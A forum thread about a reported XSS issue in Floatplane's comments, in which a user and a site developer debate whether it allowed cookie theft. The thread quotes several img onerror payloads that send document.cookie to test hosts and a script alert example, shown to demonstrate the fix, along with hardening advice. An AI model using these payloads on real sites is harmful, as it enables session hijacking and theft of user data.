Jump to content

Help XSS Vulnerability in FloatPlane.com (New Site)

! Aidan
 Share
Posted

XLLpdOr.png

 

I was able to get all HTML code, scripts etc to autorun on floatplane. I see this as a huge concern for people who are malicious and have different intent.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

@nicklmg @Slick

Judge a product on its own merits AND the company that made it.

How to setup MSI Afterburner OSD | How to make your AMD Radeon GPU more efficient with Radeon Chill | (Probably) Why LMG Merch shipping to the EU is expensive

Oneplus 6 (Early 2023 to present) | HP Envy 15" x360 R7 5700U (Mid 2021 to present) | Steam Deck (Late 2022 to present)

 

Mid 2023 AlTech Desktop Refresh - AMD R7 5800X (Mid 2023), XFX Radeon RX 6700XT MBA (Mid 2021), MSI X370 Gaming Pro Carbon (Early 2018), 32GB DDR4-3200 (16GB x2) (Mid 2022

Noctua NH-D15 (Early 2021), Corsair MP510 1.92TB NVMe SSD (Mid 2020), beQuiet Pure Wings 2 140mm x2 & 120mm x1 (Mid 2023),

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

luckily floatplane.media is better. 

muh specs 

Gaming and HTPC (reparations)- ASUS 1080, MSI X99A SLI Plus, 5820k- 4.5GHz @ 1.25v, asetek based 360mm AIO, RM 1000x, 16GB memory, 750D with front USB 2.0 replaced with 3.0  ports, 2 250GB 850 EVOs in Raid 0 (why not, only has games on it), some hard drives

Screens- Acer preditor XB241H (1080p, 144Hz Gsync), LG 1080p ultrawide, (all mounted) directly wired to TV in other room

Stuff- k70 with reds, steel series rival, g13, full desk covering mouse mat

All parts black

Workstation(desk)- 3770k, 970 reference, 16GB of some crucial memory, a motherboard of some kind I don't remember, Micomsoft SC-512N1-L/DVI, CM Storm Trooper (It's got a handle, can you handle that?), 240mm Asetek based AIO, Crucial M550 256GB (upgrade soon), some hard drives, disc drives, and hot swap bays

Screens- 3  ASUS VN248H-P IPS 1080p screens mounted on a stand, some old tv on the wall above it. 

Stuff- Epicgear defiant (solderless swappable switches), g600, moutned mic and other stuff. 

Laptop docking area- 2 1440p korean monitors mounted, one AHVA matte, one samsung PLS gloss (very annoying, yes). Trashy Razer blackwidow chroma...I mean like the J key doesn't click anymore. I got a model M i use on it to, but its time for a new keyboard. Some edgy Utechsmart mouse similar to g600. Hooked to laptop dock for both of my dell precision laptops. (not only docking area)

Shelf- i7-2600 non-k (has vt-d), 380t, some ASUS sandy itx board, intel quad nic. Currently hosts shared files, setting up as pfsense box in VM. Also acts as spare gaming PC with a 580 or whatever someone brings. Hooked into laptop dock area via usb switch

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
Just now, Syntaxvgm said:

luckily floatplane.media is better. 

lol. nice joke but seriously this needs to be sorted out.

Judge a product on its own merits AND the company that made it.

How to setup MSI Afterburner OSD | How to make your AMD Radeon GPU more efficient with Radeon Chill | (Probably) Why LMG Merch shipping to the EU is expensive

Oneplus 6 (Early 2023 to present) | HP Envy 15" x360 R7 5700U (Mid 2021 to present) | Steam Deck (Late 2022 to present)

 

Mid 2023 AlTech Desktop Refresh - AMD R7 5800X (Mid 2023), XFX Radeon RX 6700XT MBA (Mid 2021), MSI X370 Gaming Pro Carbon (Early 2018), 32GB DDR4-3200 (16GB x2) (Mid 2022

Noctua NH-D15 (Early 2021), Corsair MP510 1.92TB NVMe SSD (Mid 2020), beQuiet Pure Wings 2 140mm x2 & 120mm x1 (Mid 2023),

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author
4 minutes ago, Syntaxvgm said:

luckily floatplane.media is better. 

lmfao u made that domain just to redirect to ur profile. GG

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
Just now, Aidan Dorfler said:

lmfao u made that domain just to redirect to ur profile. GG

made it a while ago. 

muh specs 

Gaming and HTPC (reparations)- ASUS 1080, MSI X99A SLI Plus, 5820k- 4.5GHz @ 1.25v, asetek based 360mm AIO, RM 1000x, 16GB memory, 750D with front USB 2.0 replaced with 3.0  ports, 2 250GB 850 EVOs in Raid 0 (why not, only has games on it), some hard drives

Screens- Acer preditor XB241H (1080p, 144Hz Gsync), LG 1080p ultrawide, (all mounted) directly wired to TV in other room

Stuff- k70 with reds, steel series rival, g13, full desk covering mouse mat

All parts black

Workstation(desk)- 3770k, 970 reference, 16GB of some crucial memory, a motherboard of some kind I don't remember, Micomsoft SC-512N1-L/DVI, CM Storm Trooper (It's got a handle, can you handle that?), 240mm Asetek based AIO, Crucial M550 256GB (upgrade soon), some hard drives, disc drives, and hot swap bays

Screens- 3  ASUS VN248H-P IPS 1080p screens mounted on a stand, some old tv on the wall above it. 

Stuff- Epicgear defiant (solderless swappable switches), g600, moutned mic and other stuff. 

Laptop docking area- 2 1440p korean monitors mounted, one AHVA matte, one samsung PLS gloss (very annoying, yes). Trashy Razer blackwidow chroma...I mean like the J key doesn't click anymore. I got a model M i use on it to, but its time for a new keyboard. Some edgy Utechsmart mouse similar to g600. Hooked to laptop dock for both of my dell precision laptops. (not only docking area)

Shelf- i7-2600 non-k (has vt-d), 380t, some ASUS sandy itx board, intel quad nic. Currently hosts shared files, setting up as pfsense box in VM. Also acts as spare gaming PC with a 580 or whatever someone brings. Hooked into laptop dock area via usb switch

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author

lets hope no one reads this and makes a cookie stealer

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

Thanks!

 

We fixed this stuff for live chat as that's been a focus for us but we'll be sure to apply the same stuff to comments as well

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

I wonder if there would be bug bounty programs in the future once the dedicated floatplane site is up. Hoping that it'll be patched soon.

There is more that meets the eye
I see the soul that is inside

 

 

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
11 hours ago, Aidan Dorfler said:

XLLpdOr.png

 

I was able to get all HTML code, scripts etc to autorun on floatplane. I see this as a huge concern for people who are malicious and have different intent.

Yeah, we failed to sanitize the input on the backend side so we've disabled all HTML on the client app. But I wanted to add that we weren't really vulnerable to XSS because Angular would have refused to render <script> and <style> tags, preventing you from actually trying to do a <script>alert('Mouhahahahaha, I'm the king of this website!')</script> or anything that would actually be a security concern. 

Thank you for reporting this problem ^^ 

P.S: Next time, it would actually be a better idea to create your post in the Test Posts subforum and by tagging us or send us a PM if you find any security issues :) 

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author
3 hours ago, AJJaxNet said:

Yeah, we failed to sanitize the input on the backend side so we've disabled all HTML on the client app. But I wanted to add that we weren't really vulnerable to XSS because Angular would have refused to render <script> and <style> tags, preventing you from actually trying to do a <script>alert('Mouhahahahaha, I'm the king of this website!')</script> or anything that would actually be a security concern. 

Thank you for reporting this problem ^^ 

P.S: Next time, it would actually be a better idea to create your post in the Test Posts subforum and by tagging us or send us a PM if you find any security issues :) 

also, I know that it wasn't vulnerable to SCRIPT attacks, but the <img> tag DID work.... Which means you could get a website and steal the cookies that way. That's sadly how cookies work.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
2 hours ago, Aidan Dorfler said:

also, I know that it wasn't vulnerable to SCRIPT attacks, but the <img> tag DID work.... Which means you could get a website and steal the cookies that way. That's sadly how cookies work.

47 minutes ago, Aidan Dorfler said:

https://security.stackexchange.com/questions/49185/xss-cookie-stealing-without-redirecting-to-another-page is an example of what someone could have done.

In order to steal the cookies the way you described it, you need to be able to execute some javascript code on the client, and like I explained before, Angular will prevent this since it's a huge security risk to allow code execution from a request.

Just to make sure that my theory wasn't flawed, I rolled back the client app to test it out the way described in the stackexchange page : https://www.floatplane.com/video/dmXfe12Cl5

Here's all 3 comments that have code's injected to try and steal the cookies : 
  

{"id":"5a399e044b928df7473882d8","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:17:24.217Z","editDate":"2017-12-19T23:17:24.217Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d9a4b928df7473882d7","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.test.com/?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:15:38.346Z","editDate":"2017-12-19T23:15:38.346Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d34a728aad8338a176d","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=\"https://test.test.com/test.jpg?c=' + document.cookie + '\" />","replying":null,"postDate":"2017-12-19T23:13:56.708Z","editDate":"2017-12-19T23:13:56.708Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}


If I check the request from the browser, I get :
  

https://www.floatplane.com/x
https://test.test.com/test.jpg?c=%27%20+%20document.cookie%20+%20%27

No cookie actually got into the URL since the javascript code never got interpreted.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author
1 minute ago, AJJaxNet said:

In order to steal the cookie the way you described it, you need to be able to execute some javascript code on the client, and like I explained before, Angular will prevent this since it's a huge security risk to allow code execution from a request.

Just to make sure that my theory wasn't flawed, I rolled back the client app to test it out the way described in the stackexchange page : https://www.floatplane.com/video/dmXfe12Cl5

Here's all 3 comments that have code's injected to try and steal the cookies : 
  


{"id":"5a399e044b928df7473882d8","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:17:24.217Z","editDate":"2017-12-19T23:17:24.217Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d9a4b928df7473882d7","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.test.com/?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:15:38.346Z","editDate":"2017-12-19T23:15:38.346Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d34a728aad8338a176d","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=\"https://test.test.com/test.jpg?c=' + document.cookie + '\" />","replying":null,"postDate":"2017-12-19T23:13:56.708Z","editDate":"2017-12-19T23:13:56.708Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}


If I check the request from the browser, I get :
  


https://www.floatplane.com/x
https://test.test.com/test.jpg?c=%27%20+%20document.cookie%20+%20%27

No cookie actually got into the URL since the javascript code never got interpreted.

oh ok, good to know. Well, thanks for looking into this. :)

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

Just a side note, you cannot access the website's cookie via document.cookie because it has the HttpOnly flag, it's not even possible via executing it directly with your console while you're on the site. (some cookies are visible, the one that actually matter is "sails.sid").

 

However, it's possible to still hijack the session by doing actual requests with XSS imitating the client webapp and this can be easily avoided with CRSF tokens.

Anyways, Angular does sanitize scripts tags while rendering a template (like any other major framework).

 

A recommendation is to add extra common security HTTP headers, since the site uses Sails this is a nice and simple middleware that supports connect/express (sails is compatible with express). Also... or maybe a CSP policy (the HTML5 metatag that can be a pain in the ass to configure it)

 

PD: Sorry, I know it's still a very alpha site. It's just a reminder :P

Link to comment
Share on other sites
Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing General Discussion

×